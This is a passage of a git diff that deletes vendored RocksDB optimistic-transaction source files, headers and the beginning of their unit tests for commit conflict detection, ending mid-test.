-// Should only be called on writer thread in order to avoid any race conditions
-// in detecting write conflicts.
-Status OptimisticTransaction::CheckTransactionForConflicts(DB* db) {
-  Status result;
-
-  auto db_impl = static_cast_with_check<DBImpl, DB>(db);
-
-  // Since we are on the write thread and do not want to block other writers,
-  // we will do a cache-only conflict check.  This can result in TryAgain
-  // getting returned if there is not sufficient memtable history to check
-  // for conflicts.
-  return TransactionUtil::CheckKeysForConflicts(db_impl, GetTrackedKeys(),
-                                                true /* cache_only */);
-}
-
-Status OptimisticTransaction::SetName(const TransactionName& /* unused */) {
-  return Status::InvalidArgument("Optimistic transactions cannot be named.");
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.h b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.h
deleted file mode 100644
index 5a19489..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.h
+++ /dev/null
@@ -1,98 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <stack>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "db/write_callback.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "utilities/transactions/transaction_base.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-class OptimisticTransaction : public TransactionBaseImpl {
- public:
-  OptimisticTransaction(OptimisticTransactionDB* db,
-                        const WriteOptions& write_options,
-                        const OptimisticTransactionOptions& txn_options);
-
-  virtual ~OptimisticTransaction();
-
-  void Reinitialize(OptimisticTransactionDB* txn_db,
-                    const WriteOptions& write_options,
-                    const OptimisticTransactionOptions& txn_options);
-
-  Status Prepare() override;
-
-  Status Commit() override;
-
-  Status Rollback() override;
-
-  Status SetName(const TransactionName& name) override;
-
- protected:
-  Status TryLock(ColumnFamilyHandle* column_family, const Slice& key,
-                 bool read_only, bool exclusive,
-                 bool untracked = false) override;
-
- private:
-  OptimisticTransactionDB* const txn_db_;
-
-  friend class OptimisticTransactionCallback;
-
-  void Initialize(const OptimisticTransactionOptions& txn_options);
-
-  // Returns OK if it is safe to commit this transaction.  Returns Status::Busy
-  // if there are read or write conflicts that would prevent us from committing
-  // OR if we can not determine whether there would be any such conflicts.
-  //
-  // Should only be called on writer thread.
-  Status CheckTransactionForConflicts(DB* db);
-
-  void Clear() override;
-
-  void UnlockGetForUpdate(ColumnFamilyHandle* /* unused */,
-                          const Slice& /* unused */) override {
-    // Nothing to unlock.
-  }
-
-  // No copying allowed
-  OptimisticTransaction(const OptimisticTransaction&);
-  void operator=(const OptimisticTransaction&);
-};
-
-// Used at commit time to trigger transaction validation
-class OptimisticTransactionCallback : public WriteCallback {
- public:
-  explicit OptimisticTransactionCallback(OptimisticTransaction* txn)
-      : txn_(txn) {}
-
-  Status Callback(DB* db) override {
-    return txn_->CheckTransactionForConflicts(db);
-  }
-
-  bool AllowWriteBatching() override { return false; }
-
- private:
-  OptimisticTransaction* txn_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.cc b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.cc
deleted file mode 100644
index d9db6fd..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.cc
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/optimistic_transaction_db_impl.h"
-
-#include <string>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "utilities/transactions/optimistic_transaction.h"
-
-namespace rocksdb {
-
-Transaction* OptimisticTransactionDBImpl::BeginTransaction(
-    const WriteOptions& write_options,
-    const OptimisticTransactionOptions& txn_options, Transaction* old_txn) {
-  if (old_txn != nullptr) {
-    ReinitializeTransaction(old_txn, write_options, txn_options);
-    return old_txn;
-  } else {
-    return new OptimisticTransaction(this, write_options, txn_options);
-  }
-}
-
-Status OptimisticTransactionDB::Open(const Options& options,
-                                     const std::string& dbname,
-                                     OptimisticTransactionDB** dbptr) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = Open(db_options, dbname, column_families, &handles, dbptr);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-
-  return s;
-}
-
-Status OptimisticTransactionDB::Open(
-    const DBOptions& db_options, const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles,
-    OptimisticTransactionDB** dbptr) {
-  Status s;
-  DB* db;
-
-  std::vector<ColumnFamilyDescriptor> column_families_copy = column_families;
-
-  // Enable MemTable History if not already enabled
-  for (auto& column_family : column_families_copy) {
-    ColumnFamilyOptions* options = &column_family.options;
-
-    if (options->max_write_buffer_number_to_maintain == 0) {
-      // Setting to -1 will set the History size to max_write_buffer_number.
-      options->max_write_buffer_number_to_maintain = -1;
-    }
-  }
-
-  s = DB::Open(db_options, dbname, column_families_copy, handles, &db);
-
-  if (s.ok()) {
-    *dbptr = new OptimisticTransactionDBImpl(db);
-  }
-
-  return s;
-}
-
-void OptimisticTransactionDBImpl::ReinitializeTransaction(
-    Transaction* txn, const WriteOptions& write_options,
-    const OptimisticTransactionOptions& txn_options) {
-  assert(dynamic_cast<OptimisticTransaction*>(txn) != nullptr);
-  auto txn_impl = reinterpret_cast<OptimisticTransaction*>(txn);
-
-  txn_impl->Reinitialize(this, write_options, txn_options);
-}
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.h b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.h
deleted file mode 100644
index 48f8380..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.h
+++ /dev/null
@@ -1,43 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-
-namespace rocksdb {
-
-class OptimisticTransactionDBImpl : public OptimisticTransactionDB {
- public:
-  explicit OptimisticTransactionDBImpl(DB* db, bool take_ownership = true)
-      : OptimisticTransactionDB(db), db_(db), db_owner_(take_ownership) {}
-
-  ~OptimisticTransactionDBImpl() {
-    if (!db_owner_) {
-      db_.release();
-    }
-  }
-
-  Transaction* BeginTransaction(const WriteOptions& write_options,
-                                const OptimisticTransactionOptions& txn_options,
-                                Transaction* old_txn) override;
-
-  DB* GetBaseDB() override { return db_.get(); }
-
- private:
-  std::unique_ptr<DB> db_;
-  bool db_owner_;
-
-  void ReinitializeTransaction(Transaction* txn,
-                               const WriteOptions& write_options,
-                               const OptimisticTransactionOptions& txn_options =
-                                   OptimisticTransactionOptions());
-};
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_test.cc b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_test.cc
deleted file mode 100644
index f627f0e..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_test.cc
+++ /dev/null
@@ -1,1401 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <string>
-#include <thread>
-
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/transaction.h"
-#include "util/crc32c.h"
-#include "util/logging.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/transaction_test_util.h"
-#include "port/port.h"
-
-using std::string;
-
-namespace rocksdb {
-
-class OptimisticTransactionTest : public testing::Test {
- public:
-  OptimisticTransactionDB* txn_db;
-  DB* db;
-  string dbname;
-  Options options;
-
-  OptimisticTransactionTest() {
-    options.create_if_missing = true;
-    options.max_write_buffer_number = 2;
-    dbname = test::TmpDir() + "/optimistic_transaction_testdb";
-
-    DestroyDB(dbname, options);
-    Open();
-  }
-  ~OptimisticTransactionTest() {
-    delete txn_db;
-    DestroyDB(dbname, options);
-  }
-
-  void Reopen() {
-    delete txn_db;
-    txn_db = nullptr;
-    Open();
-  }
-
-private:
-  void Open() {
-    Status s = OptimisticTransactionDB::Open(options, dbname, &txn_db);
-    assert(s.ok());
-    assert(txn_db != nullptr);
-    db = txn_db->GetBaseDB();
-  }
-};
-
-TEST_F(OptimisticTransactionTest, SuccessTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  txn->Put(Slice("foo"), Slice("bar2"));
-
-  txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, WriteConflictTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-  db->Put(write_options, "foo2", "bar");
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->Put("foo", "bar2");
-
-  // This Put outside of a transaction will conflict with the previous write
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-  ASSERT_EQ(1, txn->GetNumKeys());
-
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());  // Txn should not commit
-
-  // Verify that transaction did not write anything
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, WriteConflictTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-  db->Put(write_options, "foo2", "bar");
-
-  txn_options.set_snapshot = true;
-  Transaction* txn = txn_db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  // This Put outside of a transaction will conflict with a later write
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_OK(s);
-
-  txn->Put("foo", "bar2");  // Conflicts with write done after snapshot taken
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());  // Txn should not commit
-
-  // Verify that transaction did not write anything
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, ReadConflictTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-  db->Put(write_options, "foo2", "bar");
-
-  txn_options.set_snapshot = true;
-  Transaction* txn = txn_db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  // This Put outside of a transaction will conflict with the previous read
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());  // Txn should not commit
-
-  // Verify that transaction did not write anything
-  txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-  txn->GetForUpdate(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, TxnOnlyTest) {
-  // Test to make sure transactions work when there are no other writes in an
-  // empty db.
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->Put("x", "y");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, FlushTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  txn->Put(Slice("foo"), Slice("bar2"));
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // Put a random key so we have a memtable to flush
-  s = db->Put(write_options, "dummy", "dummy");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  FlushOptions flush_ops;
-  db->Flush(flush_ops);
-
-  s = txn->Commit();
-  // txn should commit since the flushed table is still in MemtableList History
-  ASSERT_OK(s);
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, FlushTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  txn->Put(Slice("foo"), Slice("bar2"));
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // Put a random key so we have a MemTable to flush
-  s = db->Put(write_options, "dummy", "dummy");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  FlushOptions flush_ops;
-  db->Flush(flush_ops);
-
-  // Put a random key so we have a MemTable to flush
-  s = db->Put(write_options, "dummy", "dummy2");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  db->Flush(flush_ops);
-
-  s = db->Put(write_options, "dummy", "dummy3");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  // Since our test db has max_write_buffer_number=2, this flush will cause
-  // the first memtable to get purged from the MemtableList history.
-  db->Flush(flush_ops);
-
-  s = txn->Commit();
-  // txn should not commit since MemTableList History is not large enough
-  ASSERT_TRUE(s.IsTryAgain());
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, NoSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "AAA", "bar");
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  // Modify key after transaction start
-  db->Put(write_options, "AAA", "bar1");
-
-  // Read and write without a snapshot
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar1");
-  txn->Put("AAA", "bar2");
-
-  // Should commit since read/write was done after data changed
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, MultipleSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "AAA", "bar");
-  db->Put(write_options, "BBB", "bar");
-  db->Put(write_options, "CCC", "bar");
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  db->Put(write_options, "AAA", "bar1");
-
-  // Read and write without a snapshot
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar1");
-  txn->Put("AAA", "bar2");
-
-  // Modify BBB before snapshot is taken
-  db->Put(write_options, "BBB", "bar1");
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  // Read and write with snapshot
-  txn->GetForUpdate(snapshot_read_options, "BBB", &value);
-  ASSERT_EQ(value, "bar1");
-  txn->Put("BBB", "bar2");
-
-  db->Put(write_options, "CCC", "bar1");
-
-  // Set a new snapshot
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  // Read and write with snapshot
-  txn->GetForUpdate(snapshot_read_options, "CCC", &value);
-  ASSERT_EQ(value, "bar1");
-  txn->Put("CCC", "bar2");
-
-  s = txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = txn->GetForUpdate(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = txn->GetForUpdate(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-  s = db->Get(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-  s = db->Get(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = db->Get(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = db->Get(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  // verify that we track multiple writes to the same key at different snapshots
-  delete txn;
-  txn = txn_db->BeginTransaction(write_options);
-
-  // Potentially conflicting writes
-  db->Put(write_options, "ZZZ", "zzz");
-  db->Put(write_options, "XXX", "xxx");
-
-  txn->SetSnapshot();
-
-  OptimisticTransactionOptions txn_options;
-  txn_options.set_snapshot = true;
-  Transaction* txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  txn2->SetSnapshot();
-
-  // This should not conflict in txn since the snapshot is later than the
-  // previous write (spoiler alert:  it will later conflict with txn2).
-  txn->Put("ZZZ", "zzzz");
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // This will conflict since the snapshot is earlier than another write to ZZZ
-  txn2->Put("ZZZ", "xxxxx");
-
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn2;
-}
-
-TEST_F(OptimisticTransactionTest, ColumnFamiliesTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  ColumnFamilyHandle *cfa, *cfb;
-  ColumnFamilyOptions cf_options;
-
-  // Create 2 new column families
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  delete cfa;
-  delete cfb;
-  delete txn_db;
-  txn_db = nullptr;
-
-  // open DB with three column families
-  std::vector<ColumnFamilyDescriptor> column_families;
-  // have to open default column family
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  // open the new column families
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFA", ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFB", ColumnFamilyOptions()));
-  std::vector<ColumnFamilyHandle*> handles;
-  s = OptimisticTransactionDB::Open(options, dbname, column_families, &handles,
-                                    &txn_db);
-  ASSERT_OK(s);
-  assert(txn_db != nullptr);
-  db = txn_db->GetBaseDB();
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn_options.set_snapshot = true;
-  Transaction* txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  // Write some data to the db
-  WriteBatch batch;
-  batch.Put("foo", "foo");
-  batch.Put(handles[1], "AAA", "bar");
-  batch.Put(handles[1], "AAAZZZ", "bar");
-  s = db->Write(write_options, &batch);
-  ASSERT_OK(s);
-  db->Delete(write_options, handles[1], "AAAZZZ");
-
-  // These keys do no conflict with existing writes since they're in
-  // different column families
-  txn->Delete("AAA");
-  txn->GetForUpdate(snapshot_read_options, handles[1], "foo", &value);
-  Slice key_slice("AAAZZZ");
-  Slice value_slices[2] = {Slice("bar"), Slice("bar")};
-  txn->Put(handles[2], SliceParts(&key_slice, 1), SliceParts(value_slices, 2));
-
-  ASSERT_EQ(3, txn->GetNumKeys());
-
-  // Txn should commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = db->Get(read_options, handles[2], "AAAZZZ", &value);
-  ASSERT_EQ(value, "barbar");
-
-  Slice key_slices[3] = {Slice("AAA"), Slice("ZZ"), Slice("Z")};
-  Slice value_slice("barbarbar");
-  // This write will cause a conflict with the earlier batch write
-  txn2->Put(handles[1], SliceParts(key_slices, 3), SliceParts(&value_slice, 1));
-
-  txn2->Delete(handles[2], "XXX");
-  txn2->Delete(handles[1], "XXX");
-  s = txn2->GetForUpdate(snapshot_read_options, handles[1], "AAA", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Verify txn did not commit
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  s = db->Get(read_options, handles[1], "AAAZZZ", &value);
-  ASSERT_EQ(value, "barbar");
-
-  delete txn;
-  delete txn2;
-
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  std::vector<ColumnFamilyHandle*> multiget_cfh = {handles[1], handles[2],
-                                                   handles[0], handles[2]};
-  std::vector<Slice> multiget_keys = {"AAA", "AAAZZZ", "foo", "foo"};
-  std::vector<std::string> values(4);
-
-  std::vector<Status> results = txn->MultiGetForUpdate(
-      snapshot_read_options, multiget_cfh, multiget_keys, &values);
-  ASSERT_OK(results[0]);
-  ASSERT_OK(results[1]);
-  ASSERT_OK(results[2]);
-  ASSERT_TRUE(results[3].IsNotFound());
-  ASSERT_EQ(values[0], "bar");
-  ASSERT_EQ(values[1], "barbar");
-  ASSERT_EQ(values[2], "foo");
-
-  txn->Delete(handles[2], "ZZZ");
-  txn->Put(handles[2], "ZZZ", "YYY");
-  txn->Put(handles[2], "ZZZ", "YYYY");
-  txn->Delete(handles[2], "ZZZ");
-  txn->Put(handles[2], "AAAZZZ", "barbarbar");
-
-  ASSERT_EQ(5, txn->GetNumKeys());
-
-  // Txn should commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, handles[2], "ZZZ", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Put a key which will conflict with the next txn using the previous snapshot
-  db->Put(write_options, handles[2], "foo", "000");
-
-  results = txn2->MultiGetForUpdate(snapshot_read_options, multiget_cfh,
-                                    multiget_keys, &values);
-  ASSERT_OK(results[0]);
-  ASSERT_OK(results[1]);
-  ASSERT_OK(results[2]);
-  ASSERT_TRUE(results[3].IsNotFound());
-  ASSERT_EQ(values[0], "bar");
-  ASSERT_EQ(values[1], "barbar");
-  ASSERT_EQ(values[2], "foo");
-
-  // Verify Txn Did not Commit
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  s = db->DropColumnFamily(handles[1]);
-  ASSERT_OK(s);
-  s = db->DropColumnFamily(handles[2]);
-  ASSERT_OK(s);
-
-  delete txn;
-  delete txn2;
-
-  for (auto handle : handles) {
-    delete handle;
-  }
-}
-
-TEST_F(OptimisticTransactionTest, EmptyTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "aaa", "aaa");
-  ASSERT_OK(s);
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = txn_db->BeginTransaction(write_options);
-  txn->Rollback();
-  delete txn;
-
-  txn = txn_db->BeginTransaction(write_options);
-  s = txn->GetForUpdate(read_options, "aaa", &value);
-  ASSERT_EQ(value, "aaa");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = txn_db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-  s = txn->GetForUpdate(read_options, "aaa", &value);
-  ASSERT_EQ(value, "aaa");
-
-  s = db->Put(write_options, "aaa", "xxx");
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, PredicateManyPreceders) {
-  WriteOptions write_options;
-  ReadOptions read_options1, read_options2;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  txn_options.set_snapshot = true;
-  Transaction* txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  Transaction* txn2 = txn_db->BeginTransaction(write_options);
-  txn2->SetSnapshot();
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  std::vector<Slice> multiget_keys = {"1", "2", "3"};
-  std::vector<std::string> multiget_values;
-
-  std::vector<Status> results =
-      txn1->MultiGetForUpdate(read_options1, multiget_keys, &multiget_values);
-  ASSERT_TRUE(results[1].IsNotFound());
-
-  txn2->Put("2", "x");
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  multiget_values.clear();
-  results =
-      txn1->MultiGetForUpdate(read_options1, multiget_keys, &multiget_values);
-  ASSERT_TRUE(results[1].IsNotFound());
-
-  // should not commit since txn2 wrote a key txn has read
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  txn1->Put("4", "x");
-
-  txn2->Delete("4");
-
-  // txn1 can commit since txn2's delete hasn't happened yet (it's just batched)
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options2, "4", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // txn2 cannot commit since txn1 changed "4"
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_F(OptimisticTransactionTest, LostUpdate) {
-  WriteOptions write_options;
-  ReadOptions read_options, read_options1, read_options2;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Test 2 transactions writing to the same key in multiple orders and
-  // with/without snapshots
-
-  Transaction* txn1 = txn_db->BeginTransaction(write_options);
-  Transaction* txn2 = txn_db->BeginTransaction(write_options);
-
-  txn1->Put("1", "1");
-  txn2->Put("1", "2");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-
-  txn_options.set_snapshot = true;
-  txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  txn1->Put("1", "3");
